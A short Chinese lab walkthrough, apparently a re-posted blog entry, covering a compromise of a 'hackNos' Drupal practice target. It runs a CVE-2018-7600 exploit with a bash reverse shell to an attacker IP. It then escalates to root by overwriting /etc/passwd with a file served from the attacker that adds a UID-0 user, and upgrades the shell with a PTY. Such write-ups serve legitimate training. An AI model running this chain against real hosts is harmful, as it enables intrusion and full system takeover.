当前位置: 首页 > news >正文

靶场1

进入kali root权限

  • 反弹一个shell
    攻击机监听:
    nc -lvnp 10000
    目的主机:
    python3 drupa7-CVE-2018-7600.py http://210.26.72.210/drupal/ -c "bash -c 'bash -i >& /dev/tcp/210.26.72.230/10000 0>&1'"

  • 进入目标主机的命令行界面(Shell 环境)
    www-data@hackNos:/var/www/html/drupal$

  • 目标主机的命令行界面:
    cat passwd
    cat /etc/passwd
    攻击机:
    openssl passwd -1 -salt wyr 密码 生成密文
    cd /home
    mkdir wyr
    cd wyr
    touch passwd
    vim passwd(copy 目标主机文件/etc/passwd 最后一行加上wyr:$1$wyr$A20hHuKW8gs4c6LVmb270/:0:0:root:/root:/bin/bash)
    python3 -m http.server 9001

  • 目标主机的命令行界面:
    cd /etc
    wget http://210.26.72.230:9001/passwd -O /etc/passwd
    wget http://210.26.72.230:9001/passwd -O /var/www/html/drupal
    渗透测试中获取基础反向 shell 后(如通过 nc、bash 等方式),通常会立即执行这条命令,将 shell 升级为全交互模式:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  • su wyr

http://www.sczhlp.com/news/132453/

相关文章:

  • 旅游网站内容做多还是少昆明企业做网站
  • 怎么做免费的网站链接网页设计代码大全
  • 京东商城网站建设目的成都微信小程序制作价格
  • 专门做运动鞋的网站劳务公司找项目平台
  • 杭州模板网站制作上海网站建设-目前企业网站所面临的困惑
  • 做网站备案完成之后需要干什么WordPress显示网站加载时间
  • 网站设计基本原则长沙县住房和城乡建设局网站
  • 百度企业网站建设费用成都门户网站建设多少钱
  • 299、已凉
  • linux手动安装阿里云Logtail采集Nginx访问日志
  • WPF的数据绑定之通知修改
  • 古代史
  • 建设网站要做的工作内容温州英文网站建设
  • 企业网站建设公司名称自己做网站广告
  • 如何去看网站是不是响应式怎么开平台
  • 邢台123网站中职示范校建设网站
  • 柳市网站设计推广服装移动网站策划案
  • 生成手机版网站平面设计做兼职网站
  • 多层分销网站建设3d溜溜网装修效果图
  • 品牌网站建设怎么做wordpress api
  • 哪个网站可以卖自己的设计企业网站制作多少钱
  • 品牌网站建是啥用html5做网站的优点
  • 宁波网站设计服务平面设计最新招聘信息
  • 怎么取网页视频网站元素网站的盈利方式
  • matlab运行时遇到的license问题
  • HarmonyOS 5.0+ 安全加密与数据存储最佳实践指南
  • EV论文修改工作
  • HarmonyOS之设备硬件能力调用:传感器、蓝牙与定位
  • 基于HarmonyOS SDK开放能力的微博社交体验构建实践
  • 旅游类网站开发毕业设计洛阳制作网站公司哪家好